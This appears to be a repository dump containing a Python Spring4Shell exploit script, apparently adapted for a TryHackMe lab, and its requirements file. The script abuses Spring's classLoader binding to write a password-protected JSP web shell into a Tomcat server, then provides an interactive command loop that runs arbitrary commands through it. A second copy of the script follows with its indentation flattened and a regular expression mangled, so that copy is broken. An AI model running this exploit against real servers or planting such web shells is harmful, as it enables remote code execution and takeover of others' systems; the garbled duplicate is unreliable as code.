c4p-n1ck/exploit.py

## exploit.py
#!/usr/bin/env python3
# Spring4Shell Exploit
# Original Exploit: https://github.com/BobTheShoplifter/Spring4Shell-POC/
# Modified by: AG | MuirlandOracle
# AGAIN Modified with fanciness by: Captain Nick Lucifer* (*pronounced Lucifer) @naryal2580 @c4p-n1ck

import urllib.parse, \
    requests, readline, \
    argparse, re
from string import printable
from random import (
    randint,
    choice
); from stoyled import *;


verbose = True


def gen_random_name(len=13, chars=''):
    random_name = ''
    if not chars:
        chars = printable.split('!')[0]
    for _ in range(len):
        random_name += choice(chars)
    return random_name


def exploit(url, filename, password, directory, verbose=True):
    if not filename:
        filename = gen_random_name(randint(8, 18))

    headers = {"suffix":"%><!--//",
                "c1":"Runtime",
                "c2":"<%",
                "DNT":"1",
                "Content-Type":"application/x-www-form-urlencoded"
    }

    data = f"class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22{password}%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/{directory}&class.module.classLoader.resources.context.parent.pipeline.first.prefix={filename}&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="


    try:
        requests.post(url,headers=headers,data=data,timeout=15,allow_redirects=False, verify=False)
        shellurl = urllib.parse.urljoin(url, f"{filename}.jsp")
        shellgo = requests.get(shellurl,timeout=15,allow_redirects=False, verify=False)
        if shellgo.status_code == 200:
            if verbose:
                print(good(f"Shell Uploaded Successfully! at -> {shellurl}?pwd={password}"))
            else:
                print(good(f"Shell Uploaded Successfully! at -> {shellurl}"))
        else:
            if verbose:
                print(bad("Exploit failed to upload"))
    except Exception as e:
        if verbose:
            print(bad(f'Exception -> {e}'))
        pass


def shell(url, filename='', pwd='thm', cmd='id', show=True):
    resp = requests.get(urllib.parse.urljoin(url, filename), params={'pwd': pwd, 'cmd': cmd})
    stdout = re.sub("(<!--.*|- if\(\".*)", "", resp.content.decode(), flags=re.DOTALL).strip()
    if show:
        print(stdout, end='', flush=True)
    return stdout

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Spring4Shell RCE Proof of Concept')
    parser.add_argument('-u', '--url', help='Target URL')
    parser.add_argument("-f","--filename", help="Name of the file to upload (Default <somerandomfilename>.jsp)", default='')
    parser.add_argument("-p","--password", help="Password to protect the shell with (Default: thm)", default="thm")
    parser.add_argument("-d","--directory", help="The upload path for the file (Default: ROOT)", default="ROOT")
    parser.add_argument("-s","--surl", help="URL to the uploaded tomcatwar jsp (Default: null)", default='')
    args = parser.parse_args()
    if args.surl:
        url = args.surl
        try:
            while 1:
                username, hostname, pwd = shell(url, cmd='whoami', show=0).replace('\n', ''), urllib.parse.urlparse(url).netloc, shell(url, cmd='pwd', show=0).replace('\n', '')
                print(f'{bold}{green_l}{username}@{hostname}{rst}{bold}:{blue_l}{pwd}{rst}{bold}#{rst}', end='', flush=True)
                cmd = input(' ')
                if cmd in ('quit', 'exit'):
                    exit(0)
                shell(url, cmd=cmd)
        except KeyboardInterrupt:
            exit(0)
        except Exception as e:
            if verbose:
                print(bad(f'Error -> {e}'))
            exit(1)
    exploit(args.url, args.filename.split(".")[0], args.password, args.directory)

## requirements.txt
stoyled
requests
	#!/usr/bin/env python3
	# Spring4Shell Exploit
	# Original Exploit: https://github.com/BobTheShoplifter/Spring4Shell-POC/
	# Modified by: AG \| MuirlandOracle
	# AGAIN Modified with fanciness by: Captain Nick Lucifer* (*pronounced Lucifer) @naryal2580 @c4p-n1ck

	import urllib.parse, \
	requests, readline, \
	argparse, re
	from string import printable
	from random import (
	randint,
	choice
	); from stoyled import *;


	verbose = True


	def gen_random_name(len=13, chars=''):
	random_name = ''
	if not chars:
	chars = printable.split('!')[0]
	for _ in range(len):
	random_name += choice(chars)
	return random_name


	def exploit(url, filename, password, directory, verbose=True):
	if not filename:
	filename = gen_random_name(randint(8, 18))

	headers = {"suffix":"%><!--//",
	"c1":"Runtime",
	"c2":"<%",
	"DNT":"1",
	"Content-Type":"application/x-www-form-urlencoded"
	}

	data = f"class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22{password}%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/{directory}&class.module.classLoader.resources.context.parent.pipeline.first.prefix={filename}&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="


	try:
	requests.post(url,headers=headers,data=data,timeout=15,allow_redirects=False, verify=False)
	shellurl = urllib.parse.urljoin(url, f"{filename}.jsp")
	shellgo = requests.get(shellurl,timeout=15,allow_redirects=False, verify=False)
	if shellgo.status_code == 200:
	if verbose:
	print(good(f"Shell Uploaded Successfully! at -> {shellurl}?pwd={password}"))
	else:
	print(good(f"Shell Uploaded Successfully! at -> {shellurl}"))
	else:
	if verbose:
	print(bad("Exploit failed to upload"))
	except Exception as e:
	if verbose:
	print(bad(f'Exception -> {e}'))
	pass


	def shell(url, filename='', pwd='thm', cmd='id', show=True):
	resp = requests.get(urllib.parse.urljoin(url, filename), params={'pwd': pwd, 'cmd': cmd})
	stdout = re.sub("(<!--.\|- if\(\".)", "", resp.content.decode(), flags=re.DOTALL).strip()
	if show:
	print(stdout, end='', flush=True)
	return stdout

	if __name__ == '__main__':
	parser = argparse.ArgumentParser(description='Spring4Shell RCE Proof of Concept')
	parser.add_argument('-u', '--url', help='Target URL')
	parser.add_argument("-f","--filename", help="Name of the file to upload (Default <somerandomfilename>.jsp)", default='')
	parser.add_argument("-p","--password", help="Password to protect the shell with (Default: thm)", default="thm")
	parser.add_argument("-d","--directory", help="The upload path for the file (Default: ROOT)", default="ROOT")
	parser.add_argument("-s","--surl", help="URL to the uploaded tomcatwar jsp (Default: null)", default='')
	args = parser.parse_args()
	if args.surl:
	url = args.surl
	try:
	while 1:
	username, hostname, pwd = shell(url, cmd='whoami', show=0).replace('\n', ''), urllib.parse.urlparse(url).netloc, shell(url, cmd='pwd', show=0).replace('\n', '')
	print(f'{bold}{green_l}{username}@{hostname}{rst}{bold}:{blue_l}{pwd}{rst}{bold}#{rst}', end='', flush=True)
	cmd = input(' ')
	if cmd in ('quit', 'exit'):
	exit(0)
	shell(url, cmd=cmd)
	except KeyboardInterrupt:
	exit(0)
	except Exception as e:
	if verbose:
	print(bad(f'Error -> {e}'))
	exit(1)
	exploit(args.url, args.filename.split(".")[0], args.password, args.directory)